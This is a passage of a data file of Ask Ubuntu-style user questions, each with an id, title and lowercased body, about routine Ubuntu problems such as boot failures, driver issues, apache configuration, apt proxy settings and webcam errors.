empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . the strange fact is that it wants to install kernel 3.13.0 ( ubuntu base ) is there any file that i could safely remove in order to let software updater to get more space ? thanks
520514	how to enable echo service in ubuntu ?	i want to test my udp client send/receive cycle with echo service , but there is no /etc/inetd.conf mentioned in wikipedia page in ubuntu .
520518	how to enable loop dev access from lxc ?	i added the following line to the lxc container 's config file in order to enable access to loop dev . the lxc is running ubuntu 12.04 : âś lxc.cgroup.devices.allow = b 7 : * rwm âś however , the container fails to start after the change . any ideas ? ubuntu @ bpcluster1 : ~ $ sudo lxc-start -n local-server-7 lxc-start : write /sys/fs/cgroup/devices//lxc/local-server-7/devices.allow : invalid argument lxc-start : failed to setup the cgroups for 'local-server-7' lxc-start : failed to setup the container lxc-start : invalid sequence number 1. expected 2 lxc-start : failed to spawn 'local-server-7'
520521	eclipse juno crash after ubuntu update from 13.10 to 14.04	i try to update ubuntu 13.10 in 14.04 after update ... eclipse emitted this problem a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0xa75bc86d , pid=3118 , tid=3075782400 # # jre version : openjdk runtime environment ( 7.0_65-b32 ) ( build 1.7.0_65-b32 ) # java vm : openjdk client vm ( 24.65-b04 mixed mode , sharing linux-x86 ) # problematic frame : # c [ libsoup-2.4.so.1+0x5486d ] soup_session_feature_detach+0x1d # # core dump written . default location : /home/alex/and_prog/adt-bundle-linux-x86-20140702/eclipse/core or core.3118 # # an error report file with more information is saved as : # /home/alex/and_prog/adt-bundle-linux-x86-20140702/eclipse/hs_err_pid3118.log # # if you would like to submit a bug report , please include # instructions on how to reproduce the bug and visit : # http : //icedtea.classpath.org/bugzilla # the crash happened outside the java virtual machine in native code . # see problematic frame for where to report the bug . i try to update this library with synaptic but no resolved : c [ libsoup-2.4.so.1+0x5486d ] soup_session_feature_detach+0x1d
520522	is it possible to use both fglrx and intel graphic drivers simultaneously ?	i have just installed ubuntu and i 'm using the following setup : amd r9 270 ( 2 monitors ) intel hd 2500 ( 1 monitor ) with the default configuration after installing ubuntu ( radeon driver for the r9 270 ) it just works but i tried to install the proprietary drivers of amd and the third monitor stopped working . i would like to know if its possible to use both fglrx and the intel driver at the same time ( not just switching between them ) . here is a screenshot of the default configuration with the radeon driver . i tried to follow this . i wrote this xorg.conf file . as it is , the amd gpu works , but if i uncomment the hd2500 lines , it throws an error and the desktop environment does n't boot . ( /var/log/xorg.0.log ) i 've noticed that if i change the intel device driver from `` intel '' to anything else , it boots and the monitor displays the ubuntu plymouth theme loading instead of just black . ( the monitors connected to the amd card work just fine ) . sorry for my english .
520523	ca n't boot ubuntu ( dual boot system ) after migration on ssd	i 'm facing out a strange problem with my laptop about ubuntu 12.04 on a dual boot system with windows 7 . after migration from hdd to ssd , the dual booting stopped to work ( windows start automatically ) and the ubuntu partition has disappeared . there is no more uninstallation entry of ubuntu in programs and features and the diskmgmt.msc does n't seem to read the partition even if an ubuntu folder is still present in windows . before making mistakes i would like to know if is it possible to restore the dual boot or which step should i make to safely erase the ubuntu files from windows . below it 's a screenshot of the diskmgmt command : https : //dl.dropboxusercontent.com/u/47682693/diskmgmt.jpg sorry for my english , i hope to have been clear about this problem . thanks in advance .
520524	how do i force `` top '' command to show processes greater than pid xxx	i want top command to show processes that are greater than pid xxx is there a switch that can do that ? also can i sort the output based on the pid number instead of the cpu usage ?
520527	send requests to ubuntu pc locally	i 've got an google app engine instance on my ubuntu laptop and i want to send requests to it from a different machine , on the same local network . after i find my local address via ifconfig -a i tried to send a request using the ip plus the port ( 8888 ) but i always get a connection refused . any clues on this ? iptables -l -v output chain input ( policy drop 172 packets , 8812 bytes ) pkts bytes target prot opt in out source destination 126k 118m ufw-before-logging-input all -- any any anywhere anywhere 126k 118m ufw-before-input all -- any any anywhere anywhere 570 43178 ufw-after-input all -- any any anywhere anywhere 173 8864 ufw-after-logging-input all -- any any anywhere anywhere 173 8864 ufw-reject-input all -- any any anywhere anywhere 173 8864 ufw-track-input all -- any any anywhere anywhere ( ... ... ... ) when i try localhost:8888 or 127.0.0.1:8888 everything works as expected . but when i 192.168.1.5:8888 i get the connection refused . ( just to clarify )
520528	trouble with ubuntu 14.04 install	i 'm trying to install ubuntu on my hp pavilion sleekbook in order to be able to multiboot windows 8.1 and ubuntu 14.04 , but my usb drive does not boot correctly . i have tried using pendrive linux and unetbootin but i get the same result . i have changed the boot priority to usb drives but when i start my computer with the usb drive plugged in , it results in the screen flashing on and off and i get no ubuntu related response . i would really like to get it to work , but right now i have no idea of whats wrong . please help !
520529	i ca n't connect to my ubuntu server at all	nobody on the internet or in home can connect to my server not even me but it is ping able . now i can connect a keyboard to it and i can send commands but that it and the last thing i did was making a vpn server i purge it and it still does not work . the tutorial i used for vpn server or could be this one
520531	14.04.01 lts takes a very long time to boot ( 10 minutes or so )	i have tried this on vms and standalone machines and servers , and the problem is always the same . if i install ubuntu 14.04 on a machine , and i update it to 14.04.1 , the reboot takes a very long time ( in the order of 10 minutes or so . ) i removed the `` quiet splash '' on the grub config , and then what i saw was that it was hanging on console stop/waiting etc . for a long time . here 's a screenshot ( the garbled characters on the bottom of the screen was my failed attempt at screenshotting the problem on virtualbox vm . note : i captured the problem on the vm , but i see the problem on standalone desktops and servers ( 14.04.1 installed on bare metal hw ) . the problem is an issue that ubuntu should fix.. the next message i see on screen is 50 seconds later , plymouth-upstrart-bridge complaining ( see screenshot below ) ; and the following event logged is a good 40 seconds beyond that message . something very bad is going on . does anyone know what the issue is ? is this something you have fixed ? if so , where did you start ? i am hardly a linux/ubuntu noob , but 14.04 is just about the worst os i have installed in years . it is definitely not lts material .
520533	high pitched microphone noise	my internal and external ( usb ) microphone give me a high pitched noise , it 's as if the recorded sound gets in a unlimited loop and then disappears . could anyone help me fix this ? i 've an acer extensa 2510j ( alc283 ) .
520539	ext4 - jbd2/dm-1-8 - lazy initialization	i am running an operation that requires a lot of disk io . it was going extremely quickly on my 500gb ssd until jbd2/dm-1-8 appeared in my iotop and is now permanently at 95-99 % . from reading online , it looks like this may be to do with a lazy initialization of my ext4 filesystem . is there a way that i can finish creating the inode table on my ext4 partition so that i can rule out this causing the bottleneck ?
520540	error launching ubuntu on virtualbox	i 'm trying to run the latest ubuntu os on virtualbox but it displays the following error : result code : e_fail ( 0x80004005 ) component : machine interface : imachine
520542	install 14.04 via lan	i have a old machine ( pc ) which does n't contain os in it . ( i ca n't boot it from pendrive or cd ) . i want to install 14.04 over the local network on this device , as a server i could use a modern laptop with ubuntu gnome 14.04 i have . i do n't want to install ubuntu over the internet as it consumes my bandwidth : ( can some say me how to do it with the iso i have in my modern computer in detail i have tried to read the documentation of the ubuntu but could not figure it on my own .
520543	installing 14.04 from ubuntu-14.04-desktop-amd64.iso with pxe	we 're trying to do an automated network installation using pxe . we installed netboot tools ( 14.04 lts ) and extracted the ubuntu-14.04-desktop-amd64.iso contents into http server . we saw that we have to download missing repository main/debian-installer ( about 50mb ) which is necessary for netboot installation , but it is not included within the iso distribution file . installation process begin , and failed during `` download installer components '' phase saying the installer failed to download a file from the mirror . the question is `` is it possible to add main/debian-installer repository to the original ubuntu-14.04-desktop-amd64.iso contents and how ? '' . we want to do automatic installation without internet access .
520545	how to insert a line in vim	in my python application i need to write import import pdb ; pdb.set_trace ( ) for debugging . and after debugging line is removed . is there any way in gvim to insert this line by key mapping , so that i have not to type it every time ?
520546	how to extract zip file to specific folder	i have a zip file that i need to extract into another folder . when i set up extraction to said folder it says `` permission denied '' . i 've read here how to log into a terminal as root and superuser but cant find anything to help me . i need to extract a file from my downloads directory to /var/lib/plexmediaserver/library/application support/plex media server/plug-ins . please explain how to extract a zip file to the correct folder .
520550	chroot : ubuntu 14.04 - udev upgrade problems !	im running ubuntu 14.04 ( x86 ) on a openelec ( x64 ) host system . everything worked great until a few days ago when it tried to upgrade the `` udev '' package after running apt-get upgrade . apt-get upgrade output : setting up udev ( 204-5ubuntu20.5 ) ... runlevel : /var/run/utmp : no such file or directory * udev requires hotplug support , not started ... fail ! invoke-rc.d : initscript udev , action `` restart '' failed . dpkg : error processing package udev ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : udev e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the system still runs fine and i can install other packages but i would still like to get rid of this error . any ideas ?
520551	ubuntu 14.04.1 lts suspends when 12.04 lts did not	i 'm running ubuntu 14.04.1 lts server on an asus eee pc netbook . back when i had 12.04 installed , i was able to close the netbook and the system would stay running . now with 14.04 , closing the netbook puts the system in suspend mode . how do i make it so that the netbook stays powered on after closing the screen ? i have tried adding acpi=off apm=off to the default grub boot option in /etc/default/grub , but this did not work .
520553	how to run a tl-wdn3200 n600 wireless usb stick on 14.04	i 'm running a pc with recently installed 14.04 replacing windows . i need to run a tl-wdn3200 n600 wireless usb stick for urgent wi-fi access , but it seems to be only configured for windows , how can i do that ?
520556	wlan0 is not permanently turned down by ifconfig	i am trying to turn off my wifi interface using the following ifconfig command : ifconfig wlan0 down my wifi disconnected for almost one second and then it comes back up again . what is the problem and how i fix it ?
520559	how can i automatically full-screen a program in lubuntu ?	usually , the first thing i do after i have started darktable is press f11 to have it in real full-screen mode . i wonder whether i can have this automatically somehow .
520560	my ubuntu laptop can not connect to vpn ( openvpn )	very first time it was connecting but i was not able to access server . but now it is not even connecting to the openvpn . my laptop has some interfaces showing `` as0t0..as0t4 ... as0t8 '' . i dont understand why its not connecting now . let mw know how can i remove those interfaces . vpn connection to the zentyal server . i have the bundle downloaded for ubuntu/linux .
520561	just curious is it possible ps4 & raspberry pi	sup guys , i just want to find out if this random idea is can be done . i know linux struggles when it comes to gaming and even though we have wine , playonlinux and other forms of gaming api . as much as these apps are helpful in linux for someone who is new to linux they are a pain in the butt ) . why ca n't we just make a linux distro ' that is focused on high-end 3d gaming and can also be used as a business pc or a everyday pc that your mother can use . i know steam os is coming soon and as much as they are making a huge difference in the linux world will the steam os be able to switch from epic gaming to writing a document due for next week so i know its a random question but can it be possible to connect a raspberry pi to your ps4 and use them both as a gaming slash working station
520562	grive installation error	i was trying to use google drive backup in ubuntu using 'grive ' . i got the following error on running the make command : scientia @ ubuntu : ~/gdrive/grive $ make [ 1 % ] building cxx object libgrive/cmakefiles/grive.dir/src/protocol/json.cc.o /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc : in constructor ‘gr : :json : :json ( const t & ) [ with t = long int ] ’ : < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc:112:10 : error : ‘ : :json_object_new_int64’ has not been declared < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc : in constructor ‘gr : :json : :json ( const t & ) [ with t = long unsigned int ] ’ : < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc:136:10 : error : ‘ : :json_object_new_int64’ has not been declared < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc : in member function ‘gr : :json gr : :json : :operator [ ] ( const string & ) const’ : < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc:226:8 : error : ‘ : :json_object_object_get_ex’ has not been declared < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc : in member function ‘bool gr : :json : :has ( const string & ) const’ : < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc:257:9 : error : ‘ : :json_object_object_get_ex’ has not been declared < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc : in member function ‘bool gr : :json : :get ( const string & , gr : :json & ) const’ : < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc:264:7 : error : ‘ : :json_object_object_get_ex’ has not been declared < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc : in member function ‘t gr : :json : :as ( ) const [ with t = long int ] ’ : < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc:360:9 : error : ‘ : :json_object_get_int64’ has not been declared < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc : in member function ‘t gr : :json : :as ( ) const [ with t = long unsigned int ] ’ : < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc:366:9 : error : ‘ : :json_object_get_int64’ has not been declared < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc : in static member function ‘static gr : :json gr : :json : :parse ( gr : :datastream* ) ’ : < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc:507:8 : error : ‘ : :json_tokener_get_error’ has not been declared < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc:512:29 : error : ‘ : :json_tokener_get_error’ has not been declared < br/ > /home/scientia/gdrive/grive/libgrive/src/protocol/json.cc:517:3 : error : ‘ : :json_tokener_error_desc’ has not been declared < br/ > make [ 2 ] : *** [ libgrive/cmakefiles/grive.dir/src/protocol/json.cc.o ] error 1 < br/ > make [ 1 ] : *** [ libgrive/cmakefiles/grive.dir/all ] error 2 < br/ > make : *** [ all ] error 2 i followed the instruction here : http : //www.lbreda.com/grive/installation upon googling around the error , the solution suggested is to install json-c package and , libqt4-dev , qt4-dev-tools but all the above packages are already added to my system . please help me get out of this problem . thank in advance
520565	intsall dmg on ubuntu	ubuntu runs on too many commands . i am literally tired of giving commands to install mac dmg files or windows exe file . can i install dmg file in ubuntu . i want to install itunes for which i have downloaded both exe and dmg file . is there any alternate way to install above files with gui avoiding any command line . regarding lagging my hardware config : 4gb ram , amd phenom processor , gigabyte 78lmt-usb3 motherboard i find ubuntu more of command line os than gui . whenever i seek help from google the pages are all command oriented help . are there any gui programmes available where i can install different platform apps . hope i will get helpfull tips from expertise
520566	why wo n't this php script execute bash script ?	why am i not able to execute this bash script using php ? i have tried exec ( ) as well as shell_exec ( ) . index.php < ? php $ old = getcwd ( ) ; echo $ old ; chdir ( $ old ) ; $ message=exec ( `` a.sh '' ) ; print_r ( $ message ) ; ? > a.sh # ! bin/bash echo `` i am a '' > /opt/lampp/htdocs/a.txt echo `` done '' i have tried chdir as suggested here , as well as i have checked my disable_functions in php.ini , it does n't have anything . i have also checked other questions , but none seem to solve my problem .
520569	ubuntu 10.04 sub-process /usr/bin/dpkg returned an error code ( 1 ) and subprocess dpkg-deb -- fsys-tarfile returned error exit status 2	i was having trouble with my update manager . 3 programs would not update so i deleted them hoping to reinstall . it did not solve my problem . i am now trying to reinstall firefox ( i know this ppa works on my ubuntu 10.04 machine ) . if someone could help me , it would be greatly appreciated . thank you ! here are the errors : kobi @ kobi-laptop : ~ $ sudo apt-get install firefox-mozilla-build reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : firefox-mozilla-build 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0b/37.0mb of archives . after this operation , 0b of additional disk space will be used . ( reading database ... 907282 files and directories currently installed . ) unpacking firefox-mozilla-build ( from ... /firefox-mozilla-build_32.0-0ubuntu1_i386.deb ) ... adding `diversion of /usr/bin/firefox to /usr/bin/firefox.ubuntu by firefox-mozilla-build' dpkg-deb : file `/var/cache/apt/archives/firefox-mozilla-build_32.0-0ubuntu1_i386.deb ' contains ununderstood data member data.tar.xz , giving up dpkg : error processing /var/cache/apt/archives/firefox-mozilla-build_32.0-0ubuntu1_i386.deb ( -- unpack ) : subprocess dpkg-deb -- fsys-tarfile returned error exit status 2 removing `diversion of /usr/bin/firefox to /usr/bin/firefox.ubuntu by firefox-mozilla-build' errors were encountered while processing : /var/cache/apt/archives/firefox-mozilla-build_32.0-0ubuntu1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
520570	desktop ( background ) is gone	i need some help cuz my desktop ( background ) is gone . only things i see are the shortcuts . cant use terminal but i can use ctrl+alt f1 . i reinstalled ubuntu and that works ofc : p just asking if there is a solution for this . ( sorry for the bad english ) greetings , zayntina p.s this is my first post on this forum please tell me if i do something wrong ; )
520571	kubuntu 14.04 hangs on logo while startup	today i installed the newest updates for my kubuntu 14.04 and after i restarted the system , it wo n't load properly . it hangs on the logo . i was in a hurry , so i did n't look , what i installed exactly . might be the new kernel . the exact state is : the logo flickers as it usually does , till the point , where it should disappear and the login screen appear . but it does n't . it just stops flickering . but if i press the shutdown button on my pc , the logo starts flickering again . i tried booting up with the previous kernel-versions ( 3.13.0-24 - 3.13.0-34 ) and the same thing happens ( with the 24 the logo disappears and i only see a black screen ) . i have an ati graphics card with 3 monitors . intel core i5 asrock z77 pro3 i am a noob , so i do n't know , how to restore my system to a last working state . please help me with that . thank you in advance !
520573	wiping mac os completely and installing ubuntu : will the webcam work ?	what i have : old macbook ( 3,1 ) , intel core 2 duo , 2ghz , 1 processor . os : 10.5.8 the macbook is old and has a lot of problems ( ignoring the fact that the os can not be updated without paying , the disk can not be fragmented without formatting [ which would make me lose the os anyway , as i do n't have a cd to reinstall it ] so i can not arrange a dual boot [ yes , i have tried every conventional and unconventional way to resize/partition/etc. ] ) . thus , i 'd like to wipe out the entire os and install ubuntu . however , i 'm wondering whether i need to be wary of some incompatibilities . more concretely , i have two questions : will the webcam and microphone work ? do i need to prepare something beforehand while i still have mac os available ? i have to attend meetings via video conferences quite often , so this is a must . anything else to consider/prepare before formatting and installing ubuntu ?
520574	error playing video from tecknet webcam	i bought this tecknet c016 webcam and i 'm having trouble getting it to work . before buying it , i checked to see if anyone else was using it with linux and there were positive results . when i plug the webcam into my pc , i am able to turn a little wheel which activates the leds so it 's getting power . when it 's plugged in , i can see a video0 entry in /dev/ ( though sometimes it appears as video1 ) i have cheese and vlc installed . starting cheese shows the message there was an error playing video from the webcam , the same as in this question . i followed the answers for that question . cheese outputs the following to the console : libv4l2 : error turning on stream : invalid argument ( cheese:4523 ) : cheese-warning ** : internal data flow error . : gstbasesrc.c ( 2865 ) : gst_base_src_loop ( ) : /gstcamerabin : camerabin/gstwrappercamerabinsrc : camera_source/gstbin : bin17/gstv4l2src : video_source : streaming task paused , reason not-negotiated ( -4 ) running as su does n't help . i installed guvcview which opens 2 windows , of which one disappears before i get a chance to see what it is . i am left with the guvcviewer controls window . i assume the other window was to relay the video back to the screen . among other things , this is printed to the console : checking format : 1196444237 vidioc_g_comp : : inappropriate ioctl for device fps is set to 1/25 drawing controls libv4l2 : error turning on stream : invalid argument vidioc_streamon - unable to start capture : invalid argument checking video mode 640x480 @ 32bpp : ok libv4l2 : error turning on stream : invalid argument vidioc_streamon - unable to start capture : invalid argument libv4l2 : error turning on stream : invalid argument vidioc_streamon - unable to start capture : invalid argument finally , i tried vlc and opening a capture device . i set capture mode to video camera , device to /dev/video0 and video standard to all . i get the following message : your input ca n't be opened : vlc is unable to open the mrl 'v4l2 : ///dev/video0 ' . check the log for details .
520575	apache 2.4.7 in 14.04.1 ( server ) htacces problem 500 error	after a do-release-upgrade apache was updated from 2.2.22 to 2.4.7 . this upgrade went wrong . first php5 didnt work , but this has been fixed . now i 'm having problems when there are .htaccess files for a website . then i get an the following error : 500 internal server error the server encountered an internal error or misconfiguration and was unable to complete your request . please contact the server administrator at [ no address given ] to inform them of the time this error occurred , and the actions you performed just before this error . more information about this error may be available in the server error log . when i look into the error log i get : [ core : alert ] [ pid 24367 ] [ client 192.168.1.1:61274 ] /webhosting/mywebsite/.htaccess : errordocument not allowed here and i get similar error-messages for almost all the things you usually put in the .htaccess file for a website . when i move the things from the htaccess-file in between the < directory > < /directory > then the website works fine . so , in practice this means the .htaccess is useless . is there a way to fix this problem ?
520581	how do i install graphics.py on ubuntu 14.04 ?	i need to install graphics.py for class . how do i do that , and how do i install other python modules ?
520584	how can i convert a mkv file to mpg with ubuntu 14.04.1 lts ?	i have ubuntu 14.04.1 lts and a 9.5 gb file how can i convert a mkv file to mpg with ubuntu 14.04.1 lts ?
520585	ca n't boot various macs from usb , `` malformed file '' error	i have been given a usb by my university with a bootable version of ubuntu ( i am unsure what version ) pre-loaded with a bunch of software i need for robotics . several computers successfully booted off it today , and supposedly they successfully ran it on a few macs in the past . today however we tried it on a few and had no luck getting past the `` malformed file error , press any key to continue '' at start-up , as the keyboard/mouse ( both the inbuilt one and other wired ones ) did n't seem to be getting picked up . this occurs at the very first stage of booting , so there are no menus to change . note that the computers tested were an mbpr 11,1 , a macbook air of some age , and an imac about 12 months old ( the imac did n't even show the usb in the boot menu ) . when inserting the usb into the macos , the error `` the disk you inserted can not be read on this computer '' or something shows up ( which i believe all ubuntu usbs display on macs ) . i ca n't tell what the file format is on the usb , but it should n't matter ? so far i 've only tried booting it through holding option and selecting the little icon ( which actually says windows underneath it ) . all that happens is the malformed file error shows up then nothing changes . i do have virtualbox installed but it 's a bit of a mission to get a vm of a usb i believe . does anyone have any suggestions ? i know i havent got much info but i do n't have much
520587	disabling optimus / graphics cards	i have a dell xps 15 l502x . i using ubuntu 14.04 duel booted with window 7 . i looking to get more life out of my battery while in ubuntu . i have no need for the nvdia card while using ubuntu since this is where i do my work . what i would like to know is if this guide on this page can be applied to 14.04 since it makes no mention of this version in the list and if so will it benefit my battery by disabling the nvidia card ? also to note i have not installed any drivers i 'm using a the ones that ubuntu installed during the os installation .
520588	ubuntu 14.04 after upgrading problems with 3rd party software and ubuntu features	i have upgraded my system from ubuntu last version to the newest version 14.04 last week from system update window . after i rebooted my computer i notice that some of my software do not work probably and some do not work at all ; for example chrome , latex compiler and free cell solitaire . is there any way to solve this problem or i have to format my device and re-install ubuntu from the beginning ? also when ubuntu starts it gives several ( up to 7 or 8 ) error messages and thanks
520590	keyboard settings doesnt work	i upgraded to ubuntu 14.04 , and everything was fine for the first couple of days . then suddenly my keyboard setting had changed to english from danish , but when i went to keyboard settings , it was actually set to danish . i managed to fix it by removing the option english so only danish was left . and that worked for a couple of days as well . now it is back to english again even though it still says that it is set to danish ... any ideas on what i can do to fix this ?
520592	quick simple mathematics calculations	i know the program launchy from windows ( and it is also available in ubuntu ) in which i can simple enter 100/9.14 and it tells me the result without opening a calculator . but i do n't want to install the whole program just to do that ... is there probably a simple command line tool i can use ?
520593	apache2 always opens the default website on localhost	i have multiple web project on my localhost ubuntu 14.04 vm which i am trying to run using apache2 . when i open my web browser and go to http : //localhost:80 it will load apache2-graphite.conf when i try to load localhost:80/grafana from my web browser it would still load apache2-graphite.conf but not grafana.conf ? i am trying to display my grafana website which is stored at /var/www/grafana/public_html . can someone explain why does it always load apache2-graphite.conf below are the commands/files i am attaching sudo a2ensite apache2-graphite sudo a2ensite grafana sudo service apache reload root @ marshell : vi /etc/apache2/sites-available/apache2-graphite.conf < virtualhost *:80 > wsgidaemonprocess _graphite processes=5 threads=5 display-name= ' % { group } ' inactivity-timeout=120 user=_graphite group=_graphite wsgiprocessgroup _graphite wsgiimportscript /usr/share/graphite-web/graphite.wsgi process-group=_graphite application-group= % { global } wsgiscriptalias / /usr/share/graphite-web/graphite.wsgi alias /content/ /usr/share/graphite-web/static/ < location `` /content/ '' > sethandler none < /location > errorlog $ { apache_log_dir } /graphite-web_error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /graphite-web_access.log combined < /virtualhost > root @ marshell : vi /etc/apache2/sites-available/grafana.conf < virtualhost *:80 > serveradmin webmaster @ localhost servername grafana serveralias www.127.0.0.1:80/grafana documentroot /var/www/grafana/public_html errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined < /virtualhost >
520595	ralink rt5370 master mode problem	i want to set up master mode for hotspot usage , but its not working out.. it 's detecting the wi-fi networks , but could not set up access point . i have installed ap-hotspot and following methods as shown in http : //ubuntuforums.org/showthread.php ? t=2165035 while doing sudo ap-hotspot configure i got error . sriansh @ sriansh-pc : ~ $ sudo ap-hotspot configure your wireless card does not support access point mode hence i tried to change the mode to master as advised in ubuntu https : //help.ubuntu.com/community/wifidocs/mastermode sriansh @ sriansh-pc : ~ $ sudo iwconfig ra0 mode master error for wireless request `` set mode '' ( 8b06 ) : set failed on device ra0 ; invalid argument . sriansh @ sriansh-pc : ~ $ sudo iwconfig ra0 ralink sta essid : '' 11n-ap '' nickname : '' rt2870sta '' mode : auto frequency=2.412 ghz access point : not-associated bit rate:1 mb/s rts thr : off fragment thr : off encryption key : off link quality=10/100 signal level:0 dbm noise level:0 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 lo no wireless extensions . eth0 no wireless extensions . sriansh @ sriansh-pc : ~ $ nm-tool networkmanager tool state : connected ( global ) - device : ra0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- **type : 802.11 wifi driver : usb state : disconnected default : no** hw address : 00 : c1:40:62:0b:52 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points password pettesa : infra , b8 : a3:86:61:49 : dc , freq 2422 mhz , rate 54 mb/s , strength 45 wpa wpa2 0078 : infra , 00:26:15:5a:1f:0c , freq 2417 mhz , rate 54 mb/s , strength 35 wpa wpa2 beam146104 : infra , f4:3e:62 : c4:76 : e1 , freq 2417 mhz , rate 54 mb/s , strength 29 wpa blossoms : infra , d8 : fe : e3:46 : f1:9a , freq 2412 mhz , rate 8 mb/s , strength 32 wpa wpa2 dlink : infra , c8 : d3 : a3:1a:42:60 , freq 2427 mhz , rate 54 mb/s , strength 29 wpa wpa2 netgear40 : infra , 84:1b:5e:88 : a9:54 , freq 2457 mhz , rate 54 mb/s , strength 29 wpa2 - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : atl1c state : connected default : yes hw address : f4:6d:04:3c : d9:33 capabilities : carrier detect : yes speed : 100 mb/s as you can see while running nw-tool , i have observed the below . type:802.11 wifi driver : usb state : disconnected are these causing issues ? how to use ap with ralink . ( i doubt the ralink type even . it was written rt5370 on case . so , i have downloaded the drivers from the site dpo_rt5572_linuxsta_2.6.1.3_20121022 , compiled and installed them . the module rt5370sta is showing ) thanks rams
520600	how to change proxy settings with authentication ?	i am using ubuntu 13.04 and having wifi connection with proxy settings and authentication . by following some tutorials i successfully changed /etc/apt/apt.conf with the values acquire : :http : :proxy `` http : //username : p @ sswd @ 192.168.0.0:800/ '' ; acquire : :https : :proxy `` https : //username : p @ sswd @ 192.168.0.0:800/ '' ; acquire : :ftp : :proxy `` ftp : //username : p @ sswd @ 192.168.0.0:800/ '' ; acquire : :socks : :proxy `` socks : //username : p @ sswd @ 192.168.0.0:800/ '' ; the problem is my password contains `` @ '' character and i have tried everything to make it work , i tried http : //username : p\ @ sswd @ 192.168.0.0:800/ [ escape character ] i tried http : //username : p % 40sswd @ 192.168.0.0:800/ [ replacing with html-ised hex code ] i tried http : //username : p % 40sswd % 40192.168.0.0:800/ [ same to the other @ also ] i tried http : //username : p @ sswd % 40192.168.0.0:800/ [ same to the other @ only ] i tried http : //username : p\ % 40sswd @ 192.168.0.0:800/ [ escaping % character ] but none of the above worked . please suggest me some way to make it work .
520602	run a web server from any directory	i am writing a small website , but i do not want to figure out how to install and configure complete lamp stack to test the website from my ~/home directory . that will be completely disruptive and unnecessary . all i want is to have a directory , e.g . ~/home/documents/website and run a small web server from that folder as the website 's `` home '' folder . i know jekyll ( http : //jekyllrb.com ) can do something similar , but it only seems to work with ruby/jekyll-based sites that it builds and configures . is n't there some small web server program that i can easily install and then just run very simply ? for instance , if i just needed to run something like e.g . simple-server serve ~/home/documents/website from a command line and then navigate to e.g . localhost:4000 or whatever to test the site , that would be perfect . ( if this is already possible in ubuntu and i just do n't know how , please let me know . ) edit : it appears that it is much easier for readers to ignore my question and concerns , downvote my question , and then simply tell me to do the opposite of what i 'm trying to achieve . that is not constructive .
520603	terminal profile does n't list all available fonts	my gnome terminal profile let me choose only mono fonts and courier . i 'm trying to use source code pro font on my ubuntu terminal . i 've installed it successfully , in ~/.fonts , and it shows on every other program , as all the other fonts . but on terminal profile only some fonts are listed . how do i use source code pro font , and other fonts , on gnome terminal ? here is an info about my ubuntu 14.04 , tell me if you need anymore : linux dev 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:30:00 utc 2014 x86_64 x86_64 x86_64 gnu/linux
520606	ubuntu 14.04 terminal glitch	i was installing maya 2015 on ubuntu 14.04 , and as soon as i got to the command `` for i in *.rpm ; do sudo alien -cv $ i ; '' , as suggested here , the next line appears pretty much blank , except for one closing angle bracket ( > ) , and any command i ran did nothing whatsoever . please help me out !
520607	xhci_hcd fails to enumerate usb device ( 4255:0001 )	i 'm using a linux laptop to write code for embedded device . the device enumerates fine on macbook but never on ubuntu laptop . dmesg shows valiant attempts but they fail . laptop does n't seem to have bios option to turn ehci off . i 've tried disabling xhci_hcd , without much success , i feel that recompiling the kernel to make it a module is kinda too big on me right now in terms of free time . [ 114211.658509 ] usb 3-1 : new full-speed usb device number 28 using xhci_hcd [ 114211.658682 ] usb 3-1 : device not responding to set address . [ 114211.862553 ] usb 3-1 : device not responding to set address . [ 114212.066317 ] usb 3-1 : device not accepting address 28 , error -71 [ 114212.458189 ] usb 3-1 : new high-speed usb device number 30 using xhci_hcd [ 114212.474380 ] usb 3-1 : device descriptor read/8 , error -75 [ 114212.594293 ] usb 3-1 : device descriptor read/8 , error -75 [ 114212.810088 ] usb 3-1 : new high-speed usb device number 31 using xhci_hcd [ 114212.826218 ] usb 3-1 : device descriptor read/8 , error -75 [ 114212.946166 ] usb 3-1 : device descriptor read/8 , error -75 [ 114213.162001 ] usb 3-1 : new high-speed usb device number 32 using xhci_hcd [ 114213.178126 ] usb 3-1 : device descriptor read/8 , error -75 [ 114213.298096 ] usb 3-1 : device descriptor read/8 , error -75 [ 114213.513871 ] usb 3-1 : new high-speed usb device number 33 using xhci_hcd [ 114213.530002 ] usb 3-1 : device descriptor read/8 , error -75 [ 114213.649944 ] usb 3-1 : device descriptor read/8 , error -75 [ 114213.753801 ] hub 